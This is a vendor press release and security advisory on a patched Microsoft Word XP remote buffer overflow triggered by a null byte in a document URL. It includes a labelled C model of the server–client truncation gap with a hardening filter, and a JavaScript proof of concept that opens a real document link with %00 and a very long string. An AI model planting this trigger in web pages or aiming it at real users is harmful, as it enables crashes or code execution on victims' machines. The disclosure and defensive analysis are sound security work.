Finjan, the leading provider of proactive secure content management solutions for businesses of all sizes, today announced it has jointly worked with Microsoft to fix a highly dangerous vulnerability discovered by Finjan’s Malicious Code Research Center in Microsoft Word XP.
“By researching novel trends in the IT security field, Finjan’s Malicious Code Research Center (MCRC) continues to stay at the front of security research,” says Shlomo Touboul, CEO and founder of Finjan Software. “We have worked in collaboration with Microsoft to fix this security hole, as we do in other cases, in order to enhance the overall security of the Internet.”
Finjan has provided Microsoft with full technical details concerning this vulnerability and has been assisting Microsoft to patch it. Microsoft has released a patch, which can be found at this link: http://www.microsoft.com/technet/security/Bulletin/MS05-005.mspx
This vulnerability stems from improper filtering of input by Microsoft Word XP. It could have been exploited by attackers to take over users’ machines remotely, simply by luring the users to browse a malicious web page that opens a malformed document URL.
Full technical details about this vulnerability appear below. In addition, these details were published today by Finjan in several online security listings.
Finjan Customers are Proactively Protected against These Threats
Finjan enterprise customers using the latest releases of Finjan’s Vital Security™ products, and Finjan’s small and medium sized customers using the recently released 1Box™ Series are proactively protected against these vulnerabilities, as well as against other, not yet discovered ones.
About MCRC
Malicious Code Research Center (MCRC) is the leading research department at Finjan Software, dedicated to the research and detection of potential Internet and e-mail attacks. MCRC’s goal is to continue to be steps ahead of hackers attempting to exploit open platforms and technologies to develop next generation mobile malicious code, worms, Trojans, viruses and spyware. MCRC researchers also contribute to the development of next generation defense tools for Finjan’s proactive secure content management solutions. For more information, visit http://www.finjan.com/mcrc/. This specific vulnerability was discovered by Mr. Rafel Ivgi, a Security Researcher with Finjan's MCRC department.
About Finjan
Finjan Software is the leading provider of proactive, behavior-based secure content management solutions, protecting more than 2 million users from attack. Finjan surpasses the levels of defense typically offered by reactive anti-virus software solutions. Finjan uses its Vital Security™ platform to determine actual code behavior and blocks any action that violates predefined security policy. This superior technology enables Finjan to protect users proactively by responding to existing, and more importantly, yet to be developed attacks. Analyst firm IDC recognizes Finjan as the leader in the worldwide malicious mobile code security market.
Finjan and Finjan logo are trademarks or registered trademarks of Finjan Software, Inc., and/or its subsidiaries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.
Media Contacts
Jonathan Shillington / Blanaid Colley
The Global Consulting Group
Technical Section
Finjan Security Advisory
Microsoft Office XP Remote Buffer Overflow Vulnerability
Introduction
Finjan has discovered a new vulnerability in Microsoft Word XP that allows an attacker to trigger a buffer overflow. The attack can occur when a user opens a Word document through Internet Explorer, for example by following a link on a web page.
Technical Description
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that file. The problem appears upon sending a doc file request that contains a null byte (parser) at the end of the doc filename.
For example:
http://www.myhost.com/myfile.doc is a valid request.
However, this:
http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aa.doc is a malformed request. Internet Explorer nevertheless sends it, as is, to the server hosting the .doc file.
Most servers, IIS and Apache among them, truncate the requested filename at the %00: they see only the characters before it (myfile.doc), so the lookup succeeds and that file is served back to Internet Explorer.
Internet Explorer, however, still holds the full, untruncated URL string and hands it to Microsoft Word XP, which therefore receives a very long string. This string causes an exploitable buffer overflow, allowing remote code execution.
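The discrepancy described above, modelled as an added example (this is not Finjan's, Microsoft's or any web server vendor's code): url_decode() stands in for a server's percent-decoder, server_visible_len() shows why a C-string-based server serves myfile.doc although the request was far longer, client_forwarded_len() shows the length the browser still hands on to the document handler, and accept_document_name() is an assumed hardening filter (rejecting embedded null bytes, other control characters and names longer than an assumed MAX_DOC_NAME) that would stop such a request at the boundary before a native handler ever sees it. The sample paths are constructed to mirror the advisory's example.

```c
/*
 * Added example, not code from Finjan or Microsoft. Models the parser
 * differential the advisory describes: a web server percent-decodes the
 * request path into a C string, so the first %00 ends the name it sees
 * and serves ("myfile.doc"), while the browser keeps the full string and
 * hands it to the document handler. accept_document_name() is an assumed
 * hardening check, not the Microsoft fix; MAX_DOC_NAME and the sample
 * paths are illustrative assumptions.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_DOC_NAME 260   /* assumed limit for an acceptable document name */
#define DECODE_CAP   8192  /* scratch buffer size for decoded paths */

/* Percent-decode src into dst (capacity cap, always NUL-terminated).
 * Returns the number of raw bytes produced; this can exceed strlen(dst)
 * when the input contained %00. Malformed escapes are copied verbatim. */
size_t url_decode(const char *src, unsigned char *dst, size_t cap)
{
    size_t n = 0;
    while (*src != '\0' && n + 1 < cap) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            unsigned v = 0;
            sscanf(src + 1, "%2x", &v);
            dst[n++] = (unsigned char)v;
            src += 3;
        } else {
            dst[n++] = (unsigned char)*src++;
        }
    }
    dst[n] = '\0';
    return n;
}

/* Length of the name a C-string-based server actually looks up: strlen()
 * stops at the decoded null byte, so "myfile.doc%00aaaa.doc" becomes
 * "myfile.doc", the file exists, and the request succeeds. */
size_t server_visible_len(const char *request_path)
{
    unsigned char buf[DECODE_CAP];
    url_decode(request_path, buf, sizeof buf);
    return strlen((const char *)buf);
}

/* Length of the string the client keeps and forwards to the document
 * handler: every decoded byte, null and all. */
size_t client_forwarded_len(const char *request_path)
{
    unsigned char buf[DECODE_CAP];
    return url_decode(request_path, buf, sizeof buf);
}

/* Hardened filter for a name about to be passed to a native handler:
 * reject embedded nulls, other control bytes, and over-long names.
 * Returns 1 if acceptable, 0 if the request must be dropped. */
int accept_document_name(const char *request_path)
{
    unsigned char buf[DECODE_CAP];
    size_t raw = url_decode(request_path, buf, sizeof buf);
    if (raw == 0 || raw > MAX_DOC_NAME)
        return 0;
    for (size_t i = 0; i < raw; i++) {
        if (buf[i] == 0 || iscntrl(buf[i]))   /* %00 is caught here */
            return 0;
    }
    return 1;
}

/* Helper for the length check: does a name of n 'a's plus ".doc" pass? */
int long_name_accepted(size_t n)
{
    static char name[DECODE_CAP];
    if (n > sizeof name - 5)
        n = sizeof name - 5;
    memset(name, 'a', n);
    strcpy(name + n, ".doc");
    return accept_document_name(name);
}

int main(void)
{
    /* Constructed sample paths, modelled on the advisory's example. */
    const char *benign = "myfile.doc";
    const char *attack = "myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.doc";

    printf("%s: server sees %zu bytes, client forwards %zu\n",
           attack, server_visible_len(attack), client_forwarded_len(attack));
    printf("benign accepted: %d, attack accepted: %d\n",
           accept_document_name(benign), accept_document_name(attack));
    return 0;
}
```

Compile with any C99 compiler (for example cc -std=c99 nullbyte.c) and run it: the gap between server_visible_len() and client_forwarded_len() is exactly what the proof of concept further down exercises against Word XP, and the filter shows that checking the decoded bytes, not the server's truncated view, is what closes it.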
The Code (Proof of Concept)
<script>
// Build a very long string by repeating a block of junk characters.
var mylongstring, myjunk, c;
mylongstring = "";
myjunk = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
for (c = 1; c < 5000; c++)
{
    mylongstring = mylongstring + myjunk;
}
// Request the document with a URL-encoded null byte (%00) right after the
// filename, followed by the long string: the server truncates at the null
// byte and serves the real file, but Word XP receives the whole string.
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%00" + mylongstring);
</script>
Vulnerability Status
Microsoft was notified on July 13, 2004.
The bug is now fixed. For further details, please refer to Microsoft security bulletin MS05-005.
Credit
Rafel Ivgi, Malicious Code Research Center (MCRC), Finjan Software Ltd.